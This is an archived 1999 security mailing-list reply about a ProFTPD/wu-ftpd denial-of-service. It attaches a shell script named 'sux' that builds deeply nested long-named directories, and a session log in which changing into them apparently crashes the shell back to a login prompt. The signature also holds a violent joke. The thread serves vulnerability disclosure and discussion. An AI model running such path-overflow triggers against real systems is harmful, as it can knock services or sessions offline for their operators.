Re: Pro/wuFTPD DoS

From: Ultor (Ultorat_private)
Date: Sat Feb 13 1999 - 10:18:15 PST

  • Next message: Daniele Orlandi: "Re: ISS Internet Scanner Cannot be relied upon for conclusive" 

    To jest wieloczęściowa wiadomość w formacie MIME.

------=_NextPart_000_01BE5785.9ACDD480
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi

> yes,
>=20
> kills patched ProFTPD dead.
>=20
> -----snip-----
>=20
> #!/usr/local/bin/perl
> # ftpd thingy
> # bubbaat_private

[CUTED]
=20
> -----snip-----
>
> Ken Williams
> jkwilli2at_private


Hmmm i think that the problem here isn't overflow in ProFTPD.
Here is a proof.

first run attached 'sux' to make directories ...

----- snip -------
# pwd
/mnt/
# ./sux
    ok now just cd that directories
# cd A*
[CUTED]
# cd A*
ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# cd A*


Welcome to Linux 2.0.35.

ultor login:

----- snip -------=20

nice heh :)


Greeetz

-------------------------------------------------------------
 "I hack the heads off little girls and put them on my wall"
  ULT0R [Ultorat_private] - NETWORK SECURITY ADVISER
------=_NextPart_000_01BE5785.9ACDD480
Content-Type: application/octet-stream; name="sux"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="sux"

#!/bin/sh
#
# stupid thing which shows overflows in some toolz
#
# Contact: ultorat_private

STRING=3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA

i=3D0

while [ $i -le 15 ]
do=20
  i=3D`expr $i + 1`
  mkdir $STRING
  cd $STRING
  echo DIR MADE $i
done
echo NOW JUST DO $ cd XXXXXX* UNTIL IT CRASH

------=_NextPart_000_01BE5785.9ACDD480--

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:34:48 PDT